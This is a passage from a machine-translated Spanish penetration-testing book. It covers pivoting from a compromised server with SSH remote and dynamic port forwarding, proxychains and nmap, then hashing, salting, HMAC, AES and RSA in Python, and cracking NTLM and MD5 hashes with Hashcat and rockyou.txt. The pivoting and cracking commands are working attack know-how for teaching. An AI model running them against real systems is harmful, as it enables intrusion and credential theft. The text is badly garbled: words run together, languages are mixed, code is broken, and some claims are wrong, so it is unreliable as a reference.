compromisedaserverintheproductionzone (ejemplo accordingtotheprevious) .Indynamicportforwarding, Elliotwillbeabletotunnelhistrafficand zone.Inotherwords usethecompromisedserverasaproxygatewaytoscanthewholeproduction, althoughElliotdoesnothavedirectnetworkaccesstothe wholeproductionzone, byusingthecompromisedserver (prod1.ecorp.local), hewillbeabletogetthejobdoneusingdynamicportforwarding. Reenvío dinámico de puertos con SSH Por lo tanto, de acuerdo con nuestro ejemplo anterior, Elliot tiene un shell conectado prod1.ecorp.local . a este host que sirve a la aplicación web de producción de ECorp (www.ecorp.com). Por lo tanto, el puerto 443 está abierto para TLS y el puerto 22 también para SSH (por lo que el administrador podrá administrar el host de forma remota). Otra característica que usará Elliott se llama cadenas proxy; esta funcionalidad le permitirá ejecutar cualquier herramienta (como Nmap) a través de proxies HTTP, SOCKS4 y SOCKS5. En el primer paso, Elliot creará un túnel SSH (reenvío de puerto remoto) entre Kali y el host de producción comprometido. En su shell conectado, Elliot ejecutará el siguiente comando: $ssh-R443:127.0.0.1:22root@172.16.1.55 Después de ejecutar el comando de túnel SSH, Kali VM de Elliot debe estar escuchando en el puerto 443. A continuación, Elliot creará el reenvío de puerto dinámico en el puerto 9050. En otras palabras, el puerto 9050 se utilizará para redirigir el tráfico al Canal de Telegram : @IRFaraExam Machine Translated by Google Túnel SSH (el nombre de usuario administrador SSH ya ha sido comprometido por Elliot en el servidor de producción): root@kali:~#ssh-D127.0.0.1:9050-p443admin@127.0.0.1 Elliot ha utilizado el puerto 9050 porque es el número de puerto predeterminado para las cadenas de proxy SOCKS4 (de hecho, el número de puerto se utiliza para el proxy con la red Tor). Si utilizó otro número de puerto, tendría que modificar el archivo de configuración en /etc/ proxychains.conf :. root@kali:~#cat/etc/proxychains.conf #proxychains.confVER3.1 # # # Proxificador de túnel HTTP, SOCKS4, SOCKS5 con DNS. […] [ProxyList] #addproxyhere... #meanwile #defaultssetto"tor" calcetines4127.0.0.19050 Finalmente, ahora Elliot puede comenzar a ejecutar comandos en la zona de red de producción. Entonces, para escanear los hosts de producción usando Nmap, Elliot ejecutará el siguiente comando en su Kali VM: root@kali:~#proxychainsnmap-sn10.10.1.0/24 Resumen ¡Acaba de terminar otro gran capítulo de este libro! Este capítulo posterior a la explotación debería haberle brindado otra perspectiva de las técnicas de prueba de penetración. Recuerde que puede volcar las credenciales de un host de Windows (y también de un host de Linux) para usarlas en otro lugar. Después de eso, aprendió a usar el reenvío de puertos local, remoto y dinámico a través de SSH. En el capítulo siguiente, verá cómo descifrar hashes, incluido el hash NTLM. ¡Más divertido por venir! Canal de Telegram : @IRFaraExam Machine Translated by Google CAPÍTULO 13 Criptografía y craqueo de hash Uno de los mejores temas en el campo de la seguridad cibernética es el descifrado de contraseñas. Es un sentimiento especial de felicidad cuando obtiene una capa o descifra una contraseña (obtiene su valor de texto claro). Aprenderá mucho en este capítulo, así que prepárese para una larga. En este capítulo, aprenderá sobre lo siguiente: Conceptos básicos de la criptografía hash Cifrado hachís Conceptos básicos de la criptografía Desafortunadamente, la gente piensa que este es un tema complejo. La criptografía se ha utilizado durante miles de años para ocultar mensajes secretos. ¿Y adivina qué? Todavía se utiliza mucho en nuestra tecnología moderna. ¿Qué pasa con las técnicas de cifrado en nuestra era moderna? Bueno, encontrará la mayoría de ellas en este capítulo. Por lo tanto, si es un probador de penetración, necesita saber cómo piratear y aprovechar los cifrados débiles. ¿Y qué pasa con los expertos en seguridad de aplicaciones? Canal de Telegram : @IRFaraExam Machine Translated by Google la gente no debe usar cifrados débiles. Sería útil si los convenciera; ellos lo desafiarán y lo probarán. ¡No se preocupe! En las próximas secciones, veremos todas las partes prácticas del cifrado para que esté preparado para esta batalla. Conceptos básicos de hashing Los algoritmos hash confirman la integridad de los datos digitales. ¿Qué significa esto en la práctica? Suponga que acaba de descargar un archivo de Internet: ¿cómo se asegura de que el archivo de origen no haya sido alterado mientras se dirigía desde el origen al destino? Función hash unidireccional Escuchará mucho acerca de las funciones hash unidireccionales (o simplemente hashes) en su carrera como probador de penetración. Toman entradas como un correo electrónico, un archivo descargado o una contraseña, y luego generan un número a partir de la entrada. Generalmente, la salida es en hexadecimal usando algún tipo de algoritmo (por ejemplo, SHA256, MD5, etc.). Por ejemplo, el algoritmo hash SHA256 equivalente a Gu es el siguiente: 62128be42907c0866965a87657982a8e0e6ee410aeab02af667a05696384ceb5 Este es el algoritmo de una función hash unidireccional: h=alto x La salida h se denomina resumen o suma de comprobación. El H es el algoritmo hash (p. ej., SHA256). La x es el dato de entrada (basado en el ejemplo anterior, es Gus). En general (no siempre), el propósito de hash es agregar una huella digital a la pieza de datos intercambiada entre una fuente y un destino. Foranalgorithmtowork,thereareafewrequirements: El hashing se puede aplicar a cualquier bloque variable de datos de entrada. En otras palabras, la entrada puede ser cualquier cosa y no debe estar limitada. La salida hash debe tener una longitud fija independientemente del tamaño de entrada. Por lo tanto, la longitud de salida SHA-256 siempre es 256, ¡nada más! Para fines prácticos, la salida debe ser fácil de calcular. Canal de Telegram : @IRFaraExam Machine Translated by Google Además, los resultados de salida no deberían ser reversibles a su estado original; si tiene la h minúscula, que es la salida, no debería poder calcular x, que es la entrada. Finalmente, dos valores de entrada diferentes no deberían tener la misma salida (Hx ÿ Hy). Esto se llama resistencia a la colisión. HashingEscenarios Ahora, esta es la pregunta más importante: ¿dónde puede usar hashing? En términos prácticos, puede usar hashing para lo siguiente: Para generar una suma de verificación para un archivo. Al hacer esto, puede comparar la suma de verificación generada del archivo original antes de descargarlo, para compararla con la suma de verificación que genera después de la descarga. Para almacenar contraseñas en la base de datos. Esta técnica asegurará que no se almacenen contraseñas de texto sin cifrar en reposo. Para usar firmas digitales. Para capturar archivos infectados. Incluso los sistemas de detección de intrusos y los programas antivirus capturan hashes de archivos y comparan sus valores con definiciones de firma; esta técnica se utiliza para capturar archivos infectados. Algoritmos hash Hay muchos algoritmos de los que oirá hablar en su carrera. En esta sección, cubriremos los más populares para que pueda descifrarlos. Message Digest5 Message Digest versión 5 (MD5) es uno de los algoritmos hash comunes. Ha reemplazado a su predecesor MD4, que prácticamente ya no se usa porque no es un algoritmo seguro en absoluto. Precaución: ¡no utilice MD5 para almacenar contraseñas! Discutiremos algoritmos más seguros para almacenar contraseñas en las siguientes secciones de este capítulo. Esto no significa que MD5 no se pueda usar en todos. Muchas aplicaciones y sitios web todavía usan MD5 para verificar la integridad de los archivos. Canal de Telegram : @IRFaraExam Machine Translated by Google ejemplo. Usaremos Python para los ejemplos de criptografía en este capítulo y seguiremos los pasos que debe tener en cuenta para seguir con éxito los ejemplos. Primero, descargue la biblioteca criptográfica a su Kali Linux VM (o host) desde el siguiente enlace: /pypi.org/project/pycrypto/#files A continuación, abra la ventana de la terminal en su máquina virtual Kali y cambie su directorio al lugar donde se encuentran los archivos de instalación (después de descomprimir el archivo tar.gz comprimido). Para instalar el módulo de biblioteca, ejecute el siguiente comando (asegúrese de estar dentro del directorio extraído): root@kali:/opt/crypto/pycrypto-2.6.1#pythonsetup.pyinstall A continuación, abra su editor de texto favorito y escriba lo siguiente: #ImportarelmóduloCryptodesdeCrypto.HahimportMD5 #InstanciarlavariabledefunciónMD5 h=MD5.new() #Calculatethehash h.update(mensaje) #Imprimirelvalorhexadecimal printh.hexdigest () Guarde el archivo como md5_example.py andrunit: root@kali:~#pythonmd5_example.pyb10a8db164e0754105b7a99be72e3fe5 Let'stakeamomenttobreakdownthePythonsourcecode.InPython, que prependacommentwiththe # (thislineisnotexecuted) .Inthesecondline, que areimportingthecryptolibrarybytellingit (thePythoninterpreter) thatwewant tousetheMD5function.Then, hachís wedefinethemessagevariablethatwewantto (inotherwords, wewanttohashthemessage “Hola Mundo”). Afterthat, weinstantiatedtheMD5hashingvariable.Next, weusethe actualización functionto computethehashvalueofthemessagevariable.Finally, weprintthe128 ÿbit valor hash en hexadecimal. Usaremos el mismo concepto en las próximas secciones; si entendió cómo funciona este ejemplo, entonces los otros serán pan comido. Canal de Telegram : @IRFaraExam Machine Translated by Google SecureHashAlgorithm Al igual que MD5, el algoritmo de hash seguro (SHA) está lejos de hacer hash con un mejor mecanismo de seguridad. Ahora, hay varias versiones de SHA. Por ejemplo, la versión 0 de SHA es la primera, pero ya no se usa. SHA224 SHA256 SHA384 SHA512 Los números al final representan la longitud de salida del resumen. Por ejemplo, SHA224 genera 224 bits de salida. La organización NIST introdujo la versión 3 de SHA posteriormente, e incluye también varias subversiones: 224, 256, 384 y 512 bits. SHA3esconsideradoelalgoritmohashingmásseguroactualmente.Estecapítulofueescritoen2020,peroprob fromCrypto.HashimportSHA512 mensaje='HelloWorld' h=SHA512.new() h.update(mensaje) printh.hexdigest() Nuevamente, asegúrese de guardar el archivo (lo llamé sha_example.py ) y ejecútelo: root@kali:~#pythonsha_example.py2c74fd17edafd80e8447b0d46741ee243b7eb74dd2149a0ab1b9246fb303 Contraseñas Hashing El mejor método para proteger las contraseñas guardadas en reposo (en una base de datos, por ejemplo) se logra mediante hash. Cuando un nuevo usuario se registra por primera vez en un sitio web, el usuario elige una contraseña, ¿verdad? Canal de Telegram : @IRFaraExam Machine Translated by Google El código fuente del back-end utilizará un algoritmo hash seguro, como SHA256, para generar una salida hash antes de guardarla en la base de datos. Ahora la base de datos contiene una contraseña sin sentido y no reversible. Tenga en cuenta que incluso el propio administrador puede revelar la contraseña original. Probablemente se esté preguntando, ¿cómo se autenticará el usuario si la contraseña está codificada? La respuesta es simple: cuando este usuario intenta iniciar sesión con una contraseña, el algoritmo hash (SHA256, en este caso) se usa nuevamente para calcular la salida. Luego, esta salida se compara con la copia guardada en la base de datos. Si son iguales, entonces el usuario es autenticado. Protección de contraseñas con hash Para almacenar contraseñas de forma segura, debe seguir estas pautas: No utilice MD5 o SHA1 para almacenar contraseñas. Utilice SHA2 o SHA3, preferiblemente. Utilice la sal para mitigar los ataques de fuerza bruta contra contraseñas. Entonces, ¿qué está salando exactamente? ¿No se supone que el shinging debe ser seguro? Es seguro, pero hay otra pregunta para usted. ¿No se está preguntando por qué no menciona MD5 o SHA1? De hecho, todos están relacionados con un solo problema, que es adivinar contraseñas mediante el uso de ataques de fuerza bruta y diccionario. El algoritmo MD5 es rápido, mientras que SHA2 es más complicado y más lento. Por lo tanto, un ataque de fuerza bruta tardará más en adivinar una contraseña que use SHA2. Además, MD5 genera una salida de 128 bits en comparación con SHA256, que produce una salida de 256 bits. Cuanto más tiempo, mejor. Ahora llega el turno de la salazón. Una técnica de salazón se lleva a cabo agregando caracteres aleatorios a la contraseña antes de aplicar los algoritmos hash. He aquí un ejemplo: Antes, sin Salar Digamos que la contraseña es 12345 y la salida SHA256 es igual a ABFF56CC … inhex (esa no es la salida real, pero solo por el bien de esto ejemplo). Un hacker ya podría pregenerar un conjunto de palabras del diccionario y, por lo tanto, Canal de Telegram : @IRFaraExam Machine Translated by Google saber que ABFF56CC … es 12345 , ¡así que serás hackeado! Después con Salazón Ahora usemos la técnica de salado y comparemos la diferencia entre los dos: Salt+Password=ABC+12345= ABC12345 (aquí antepuse los caracteres ABC a la contraseña 12345). Entonces, en SHA256, es igual a FFFF55DD... en hexadecimal. Usando un prefijo salt de ABC, el atacante no podrá adivinar la contraseña porque la salida no puede asumirse usando ataques de diccionario. Aún mejor es si usa un valor salt diferente para cada contraseña. Mensaje basado en hashAuthenticatedCode El código autenticado de mensajes basado en hash (HMAC) es otro algoritmo de hash. Pero este especial requiere una clave secreta para usar antes de aplicar el hash. Lo bueno de este algoritmo es que ofrece integridad y autenticidad. HMAC usa MD5 o SHA1 como algoritmo hash; Entonces, ¿cómo funciona esto? Digamos que Tyrell, el remitente, quiere enviar un mensaje a Joanna. Tyrell puede usar un algoritmo hash como MD5 para hacer hash del mensaje para la integridad. Luego, usa una clave para calcular otro hash para lograr la parte de autenticidad. Por lo tanto, use el algoritmo HMA. Tyrell envía el mensaje a Joanna, y Joanna usa la misma clave secreta para calcular el hash original de Tyrell. Ahora, si los resultados de HMAC coinciden con el HMAC inicial generado por Tyrell, entonces podemos decir que el mensaje no fue alterado y auténtico al mismo tiempo. La autenticidad se debe a la clave compartida entre Joanna y Tyrell. Un concepto importante en HMAC es que el mensaje no está cifrado aquí, sino que permanece en texto sin cifrar, por lo que toda la idea es garantizar la integridad y autenticidad del mensaje de texto sin cifrar. Veamos cómo funciona en Python: FromCrypto.HashimportHMAC secret_key='fsociety' Canal de Telegram : @IRFaraExam Machine Translated by Google mensaje='ECorpis Hackeado.' h=HMAC.nuevo(secret_key) h.update(mensaje) printh.hexdigest() Aquí se ve cuando la unidad: root@kali:~#pythonhmac_example.py 4dc5e4bca6512cf3c64d19821eb17e2a Como de costumbre, importamos la biblioteca que queremos usar, que es HMAC en este ejemplo. A continuación, agregamos la variable para la clave secreta y la almacenamos en una variable. Después de eso, lo pasamos al objeto HMAC. Luego creamos el has de la variable de mensaje. De forma predeterminada, el algoritmo elegirá el HMAC-MD5. Finalmente, imprimimos la salida del resumen. Conceptos básicos del cifrado El cifrado se divide en dos categorías: simétrico y asimétrico. El cifrado simétrico utilizará una clave para cifrar y descifrar datos. Por otro lado, el cifrado asimétrico utilizará claves públicas y privadas únicas para cifrar y descifrar datos. En las siguientes secciones, cubriremos los algoritmos de cifrado con más detalle. Cifrado simétrico Este tipo de cifrado se usó por primera vez en los viejos tiempos antes de que se descubrieran las computadoras y todavía se usa mucho en nuestra era moderna. En resumen, para este tipo de encriptación, usará una clave secreta para encriptar datos de texto simple y luego usará la misma clave para desencriptar y revelar el texto en su estado original. AvanzadoCifradoEstándar Advanced Encryption Standard (AES) es el algoritmo seguro recomendado por NIST para el cifrado simétrico. En esta sección, descubrirá cómo funciona AES. Revisemos los desafíos que tenemos para el cifrado AES. La primera, la clave, debe tener una longitud fija, ya sea 128, 192 o 256 bits. En nuestro ejemplo (lo verá pronto en el código Python), usaremos 128 bits, pero puede experimentar con tamaños de clave más seguros. Canal de Telegram : @IRFaraExam Machine Translated by Google lo que nos asegurará que la longitud será de 128 bits. Otro desafío que tenemos es el vector de inicialización. No hablamos sobre el IV anteriormente, pero necesitará un cifrado asimétrico, y debe ser aleatorio. Si se está preguntando qué es IV, en una definición simple, considérelo como una segunda clave aleatoria. El problema era que el IV se reutilizaba en varias sesiones y un hacker podía olfatear la red inalámbrica y, después de algunos intentos, capturar el valor del IV; entonces un ataque de fuerza bruta revelaría la clave. ¡Espera! Todavía no hemos terminado; todavía tenemos algunos desafíos más. Recuerde, AES usa un tamaño de bloque de 128 bits para la entrada de texto claro. Por lo tanto, tenemos que separar nuestra entrada en fragmentos de 128 bits. Por último, usaremos el modo de cadena de bloques en AES; esta es la opción más popular y la que yo uso personalmente. (Si lo desea, siéntase libre de explorar más tipos; puede consultar la documentación de Python de la biblioteca criptográfica). #Importar módulo AES de Crypto.CipherimportAES #Importar módulo MD5 de Crypto.HashimportMD5 #ImportarmóduloRandom deCryptoimportRandom #Importbase64module importbase64 #Defineelnombre"AESCrypto"paranuestraclasedeobjetoAESCrypto: #Definir una función para que haya ingresado texto y devuelto un valor de resumen hexadecimal defmd5_hash(self,text): h=MD5.new() h.update(texto) returnh.hexdigest() #Esteeseliniciadordeobjetosdeclaseydefinirálaclave Canal de Telegram : @IRFaraExam Machine Translated by Google tamaño def__init__(self,key): #KeySizeis128bits self.key=self.md5_hash(key) #Definirlafunciónquecifraráuntextodefcrypt(self,cleartext): #El tamaño del bloque debe ser igual a 128 bits Block_Size=AES.block_size pad=lambdas:s+(Block_Size-len(s)%Block_Size)*chr (Block_Size-len(s)%Block_Size) cleartext_blocks=pad(texto claro) #CreateARandomIViv=Random.new().read(Block_Size) crypto=AES.new(self.key,AES.MODE_CBC,iv) returnbase64.b64encode(iv+crypto.encrypt(cleartext_blocks)) #Definir una función para descifrar un texto a su estado original defdecrypt(self,enctext): enctext=base64.b64decode(enctext) iv=enctext[:16] crypto=AES.new(self.key,AES.MODE_CBC,iv) #Unpadtheblocksbeforedecrypting unpad=lambdas:s[0:-ord(s[-1])] returnunpad(crypto.decrypt(enctext[16:])) #EstasecciónusaráelobjetoAESysusfunciones. print'Cifrandoelmensaje:HolaMundo.Usandolacontraseña/clave:contraseña123' print'---------------------------------------------------- -------------' aes=AESCrypto('contraseña123') encriptado=aes.encrypt('HelloWorld') print'Encrypted:'+encrypted decrypted=aes.decrypt(encrypted) print'Descifrado :'+descifrado Aquí se muestra cómo se ve cuando lo ejecuto: root@kali:~#Pythonaes_example.pyCifradodelmensaje:HolaMundo.Usandolacontraseña/ clave:contraseña123 Canal de Telegram : @IRFaraExam Machine Translated by Google ----------------------------------------Cifrado:/qfMVk7TA2DwgqNTFMifQCvV8jr4hcdNGy3vX9Zut0k= Descifrado: Hola Mundo Cifrado asimétrico El cifrado asimétrico es un invento fantástico en seguridad. Por ejemplo, le permite comunicarse de forma segura a través de Internet mediante SSL/ TLS . Muchos sistemas y protocolos utilizan este tipo de cifrado actualmente, como TLS, SSH, SFTP y muchos más. Entonces, ¿cómo ciframos los datos mediante el cifrado asimétrico? Veamos un ejemplo práctico. Elliot quiere enviar un correo electrónico a Darlene y quiere cifrar los datos mediante AES, que vimos en el módulo anterior. ¿Cómo puede enviarle la clave de manera segura y eficiente al mismo tiempo? En este caso, Elliot le pedirá a Darlene su clave pública y ella se la enviará a Elliot. Por lo tanto, Elliot cifrará el mensaje con una clave AES y enviará el mensaje cifrado a Darlene. Además, incluye una copia cifrada de la clave AES utilizando la clave pública de Darlene. Ahora es seguro enviar el mensaje. En este momento, Darlene recibirá el mensaje cifrado y la copia cifrada de la clave AES. Luego, usará su clave privada para descifrar y revelar la clave AES. Ahora, probablemente se esté preguntando por qué Elliot usa metodologías tanto simétricas como asimétricas para enviar un correo electrónico. ¿Por qué no usa solo las claves pública y privada para el cifrado? Usamos esto como un ejemplo a propósito porque muchos de los protocolos, como TLS, se basan en este flujo de trabajo. Recapitulemos lo que hemos aprendido sobre el cifrado asimétrico: La clave pública receptora cifra el contenido original. Canal de Telegram : @IRFaraExam Machine Translated by Google La clave privada del destinatario descifra el contenido cifrado. El algoritmo recomendado para este tipo de encriptación es RSA, y por razones de seguridad, actualmente se recomienda usar 2048 o 4096 bits. Otro desafío surgió con la tecnología más reciente de los dispositivos móviles. El hardware dentro de ellos no puede procesar el cálculo del algoritmo RSA rápidamente. El genio matemático surgió con otro enfoque llamado criptografía de curva elíptica (ECC), y hoy en día, se usa mucho en dispositivos de hardware lento. RivestShamirAdleman Rivest Shamir Adleman (RSA) es el algoritmo más popular usado en el cifrado asimétrico. Implementar RSA en Python es un ejercicio emocionante para aprender. Después de terminar esta lección, podrá hacerlo usted mismo. Antes de saltar al código fuente, analicemos la estructura de la aplicación que vamos a desarrollar (vea la figura 13.1). Figura 13.1 Herramienta RSA Primero, la herramienta generará una clave pública y una clave privada. Después de eso, guardaremos cada clave en un archivo separado y usaremos la extensión PEMe para cada una. Para el proceso de cifrado, la aplicación cargará primero el archivo de clave pública y Canal de Telegram : @IRFaraExam Machine Translated by Google recibir el texto sin cifrar para cifrar. En esta etapa, hemos cifrado la salida de texto. En el proceso de descifrado, cargaremos la clave privada del archivo que generamos anteriormente y proporcionaremos los datos cifrados que queremos descifrar. Finalmente, tenemos el valor de texto claro original descifrado. Saltemos al código fuente y comencemos a hacerlo en Python (siguiendo los mismos patrones que el anterior para AES): FromCrypto.PublicKeyimportRSA fromCrypto.CipherimportPKCS1_OAEP fromCryptoimportRandom fromCrypto.HashimportSHA256 importbase64 classCryptoRSA: PRIVATE_KEY_FILE="private_key.pem" PUBLIC_KEY_FILE="clave_pública.pem" def__init__(auto): volver def__save_file(self,contents,file_name): f=open(file_name,'w') f.write(contents) f.close() def__read_file(self,file_name): f=open(file_name,'r') contenidos=f.read() f.close() returncontents def__generar_aleatorio(uno mismo): volverRandom.nuevo().leer() defgenerate_keys(self): keys=RSA.generate(4096) private_key=keys.exportKey("PEM") public_key=keys.publickey().exportKey("PEM") self.__save_file(private_key,self.PRIVATE_KEY_FILE) self.__save_file (public_key,self.PUBLIC_KEY_FILE) print"Public&PrivateKeys;generadas y guardadas con éxito!" defencrypt(self,cleartext,public_keypath=Ninguno): if(public_keypath==Ninguno): Canal de Telegram : @IRFaraExam Machine Translated by Google public_keypath=self.PUBLIC_KEY_FILE public_key=RSA.importKey(self.__read_file(public_keypath)) cipher=PKCS1_OAEP.new(public_key) encrypted_data=cipher.encrypt(cleartext) returnbase64.b64encode(encrypted_data) defdecrypt(self,cipher_text,private_key_path=Ninguno): ifprivate_key_path==Ninguno: private_key_path=self.PRIVATE_KEY_FILE cipher_text=base64.b64decode(cipher_text) private_key=RSA.importKey(self.__read_file(private_key_path)) cipher=PKCS1_OAEP.new(private_key) returncipher.decrypt(cipher_text) +datos_cifrados #EnestasecciónllamamosalobjetoRSAysusfuncionalidadesCryptoRSA().generate_keys()crypted_data=Crypto +datos_descifrados Así es como se ve cuando estamos unidos en KaliLinux: root@kali:~#Pythonrsa_example.pyPublic&PrivateKeys; ¡generadas y guardadas con éxito! Cifrado:FuI+aoorcmI4OuZtapoT49ZAbyJpHEXIlGH4/oS0yj6qSPTMtQYJiT7rXNhqhDil8SghhdO0Y0YSbb Descifrado: Hola Mundo Descifrando secretos con Hashcat Whenitcomestocracking, Hashcatisthetoolofchoice.Thisapplicationis versatileandfast.Likeanytool, youcanalwaysusethehelpsectiontolookfor theoptionyou'retryingtoachieve.InKali, Hashcatisalreadypre instalado, de modo youdon'thavetoworryaboutthatpart.Intheexamplesofthissection, wewill useapowerfulcustomcrackingrigbuiltwithsixGPUcards.Cracking passwordsofflineneedsalotofcomputation.Still, we'relivinginanerawhere miningisbecomingpopular, andtheGPUpowerhelpsus, profesionales assecurity, togetallthesupportthatweneedtobuildpowerfulmachines. Canal de Telegram : @IRFaraExam Machine Translated by Google (Construir múltiples componentes de GPU utilizando elevadores PCIE que son tan fáciles de obtener en estos días en comparación con el pasado donde teníamos que instalar las tarjetas gráficas directamente en la placa base). El sitio oficial de Hashcat es hashcat.net/. BenchmarkPruebas El primer ejercicio que puede ejecutar con Hashcat es la prueba comparativa. En este ejemplo, usaremos esta herramienta para probar la velocidad de descifrado de hashes NTLM en la plataforma. Aunque estamos probando este comando en un host de Windows, puede aplicar el mismo principio en Kali: C:\Usuarios\Gus\Documentos\hashcat-6.1.1>hashcat.exe-m1000-w3-b hashcat(v6.1.1)iniciando en modo de referencia... CUDAAPI (CUDA11.1) ==================== *Dispositivo #1:GeForceRTX2070,6744/8192MB,36MCU *Dispositivo #2:GeForceRTX2070,6744/8192MB,36MCU *Dispositivo #3:GeForceRTX2070,6744/8192MB,36MCU *Dispositivo #4:GeForceRTX2070,6744/8192MB,36MCU *Dispositivo #5:GeForceRTX2070,6744/8192MB,36MCU *Dispositivo #6:GeForceRTX2070,6744/8192MB,36MCU OpenCLAPI(OpenCL1.2CUDA11.1.70)-Plataforma#1[NVIDIA Corporation] ================================================== ===================== *Dispositivo n.º 7: GeForceRTX2070, omitido *Dispositivo n.º 8: GeForceRTX2070, omitido *Dispositivo n.º 9: GeForceRTX2070, omitido *Dispositivo n.º 10: GeForceRTX2070, omitido *Dispositivo n.° 11: GeForceRTX2070, omitido *Dispositivo n.º 12: GeForceRTX2070, omitido Opciones relevantes de Benchmark: =========================== *--workload-profile=3 Modo hash: 1000-NTLM Velocidad.#1………:16644.7MH/s(72.14ms)@Accel:32Lazos:1024Thr:1024Vec:1 Velocidad.#2…………:17002.3MH/s(70.62ms)@Accel:32Lazos:1024Thr:1024Vec :1 Velocidad.#3………:16657.6MH/s(72.11ms)@Accel:32Bucles:1024Thr:1024Vec:1 Canal de Telegram : @IRFaraExam Machine Translated by Google Velocidad.#4………:16435.3MH/s(73.12ms)@Accel:32Bucles:1024Thr:1024 Ya: 1 Velocidad.#5………:16975.5MH/s(70.78ms)@Accel:32Bucles:1024Thr:1024Vec:1 Velocidad.#6………:16637.0MH/s(72.25ms)@Accel:32Bucles:1024Thr:1024Vec:1 Velocidad.#*………:100.4GH/s Comenzó:miéoct2114:44:382020 Detenido: miéoct2114:45:002020 De acuerdo con los resultados de salida, la velocidad total de las seis tarjetas gráficas combinadas es 100,4 GigaNTLMhashes por segundo. Ahora repasemos cada opción utilizada en El comando: ÿm1000 : la m representa el modo y 1000 es el código para NTLM. ÿw3 : La w significa carga de trabajo y 3 significa alto rendimiento (usted obtener más información sobre las cargas de trabajo en un momento). ÿb :Esto simplemente representa la prueba comparativa. Es posible que tenga dos preguntas que le vienen a la mente: ¿Cómo supimos que el número de modo NTLM es 1000? ¿Qué es el rendimiento de la carga de trabajo? La respuesta directa a ambas preguntas para usar el contenido de ayuda del hashcat mando: $hashcat--ayuda Para encontrar la lista de modos Hashcat, busque la sección [Hashmodes] . Tú encontrará todos los algoritmos admitidos que Hashcat puede descifrar (hay un montón de ellos!). Aquí hay una instantánea del comienzo de esta lista: -[Modos hash] - #|Nombre |Categoría = =====+============================================ ======+===================== 900|MD4 0|MD5 100|SHA1 1300|SHA2-224 1400|SHA2-256 |Hash sin procesar |Hash sin procesar |Hash sin procesar |Hash sin procesar |Hash sin procesar Canal de Telegram : @IRFaraExam Machine Translated by Google 10800|SHA2-3841700| SHA2-512[…] |Hash sin procesar |Hash sin procesar Puede visitar el siguiente enlace en el sitio web de Hashcat para visualizar todos los algoritmos soportados: hashcat.net/wiki/doku.php?id=ejemplo_hashes Para los perfiles de carga de trabajo, hicimos lo mismo. estamos utilizando un perfil de carga de trabajo de alto rendimiento. profileissetto2. Aquí hay una copia de los perfiles de carga de trabajo de la sección de ayuda de Hachís: -[Perfiles de carga de trabajo] - #|Rendimiento|Tiempo de ejecución|Consumo de energía|Impacto en el escritorio ===+=============+=========+======================= =============== 1|Bajo|2ms 2|Predeterminado|12ms 3|Alta|96ms 4|Pesadilla|480ms|Loco |Baja |Económico |Alto |Mínimo |Notable |No responde |Sin cabeza CrackingHashesinAcción En esta sección, aprenderá cómo usar Hashcat para comenzar a descifrar hashes. ejemplo, crackearemos un hash MD5 utilizando el modo de ataque de archivo de diccionario con el archivo rockyou.txt . Esto es lo que parece descifrar un hash MD5: C:\Usuarios\Gus\Documentos\hashcat-6.1.1>hashcat.exe-a0-m0-w3-o"C:\Usuarios\Gus\Documentos\Resultados agrietados.txt" "C:\Usuarios\Gus\Documentos\hashes.txt" "C:\Usuarios\Gus\Documentos\Contraseñas\rockyou\rockyou.txt" hashcat (v6.1.1) comenzando... […] Acercándose a la carga de trabajo del espacio clave final ajustada. Sesión……….:hashcat Estado………..:Agrietado Hash.Nombre……..:MD5 Hash.Objetivo……:42f749ade7f9e195bf475f37a44cafcb Hora.de.inicio…..:WedOct2115:40:052020(0secs) Tiempo.Estimado…: MiéOct2115:40:052020(0 segundos) Guess.Base…….:Archivo Canal de Telegram : @IRFaraExam Machine Translated by Google (C:\Usuarios\Gus\Documentos\Contraseñas\rockyou\rockyou.txt) Guess.Queue……:1/1(100.00%) Velocidad.#1………:0H/s(0.00ms)@Accel:1024Bucles:1Thr:64Vec:1 Velocidad.#2………:20174.4kH/s(3.28ms)@Accel:1024Bucles:1Thr:64 Ya: 1 Velocidad.#3………:0H/s(0.00ms)@Accel:1024Lazos:1Thr:64Vec:1 Velocidad.#4…………:0H/s(0.00ms)@Accel:1024Lazos:1Thr:64Vec:1 Velocidad.#5………:0H/s(0.00ms)@Accel:1024Lazos:1Thr:64Vec:1 Velocidad.#6…………:0H/s(0.00ms)@Accel:1024Lazos:1Thr:64Vec:1 Velocidad.#*………:20174.4kH/s Recuperado……..:1/1(100.00%) Progreso de resúmenes…………:6354326/14344384(44.30%) Rechazado………:0/6354326(0.00%) Punto.de.restauración….:0/14344384(0.00%) Restaurar.Sub.#1…:Sal:0Amplificador:0-0Iteración:0-1 Restaurar.Sub.#2…:Sal:0Amplificador:0-1Iteración:0-1 Restaurar.Sub.#3…:Sal:0Amplificador: 0-0Iteración:0-1 Restaurar.Sub.#4…:Sal:0Amplificador:0-1Iteración:0-1 Restaurar.Sub.#5…:Sal:0Amplificador:0-0Iteración:0-1 Restaurar.Sub.# 6…:Sal:0Amplificador:0-1Iteración:0-1 Candidatos.#1….:[Copiando] Candidatos.#2….:123456->158417 Candidatos.#3….:[Copiando] Candidatos.#4….:rayvins->lanardota2 Candidatos.#5….: [Copiando] Candidatos.#6….:15841530->rayvinz Hardware.Mon.#1..:Temp:38cFan:0%Util:0%Core:1410MHzMem:6801MHzBus:1 Hardware.Mon.#2..:Temp:38cFan: 0% Util:6% Núcleo:1410MHzMem:6801MHzBus:1 Hardware.Mon.#3..:Temp:39cVentilador:0%Util:6%Núcleo:1410MHz Mem:6801MHzBus:1 Hardware.Mon.#4..:Temp:56cFan:5%Util:1%Core:1845MHzMem:6801MHzBus:1 Hardware.Mon.#5..:Temp:40cFan:0%Util:0%Core:1410MHzMem:6801MHzBus :1 Hardware.Mon.#6..:Temp:37cFan:0%Util:6%Core:1410MHzMem:6801MHzBus:1 Comenzó:miéoct2115:39:512020 Detenido: miéoct2115:40:072020 Esta es la explicación de cada opción utilizada en el comando: ÿa0 : En esta opción, ÿa es el modo de ataque; cero significa que es un ataque basado en adicciones. Canal de Telegram : @IRFaraExam Machine Translated by Google ÿm0 : en esta opción, ÿm es el tipo hash; 0 es para el algoritmo MD5. ÿo : Este es el nombre del archivo de salida (la versión descifrada se guardará en este archivo). Además, tenga en cuenta que guardamos los hashes en el archivo hashes.txt . 42F749ADE7F9E195BF475F37A44CAFCB ¡Listo! Esteeselcontenidodeltextoclaroqueseguardaenelarchivo Resultados agrietados.txt : 42f749ade7f9e195bf475f37a44cafcb:Contraseña123 Modos de ataque Hay varias formas de descifrar secretos con Hashcat. Probablemente esté familiarizado con los ataques de fuerza bruta o los ataques de diccionario. En esta sección, se 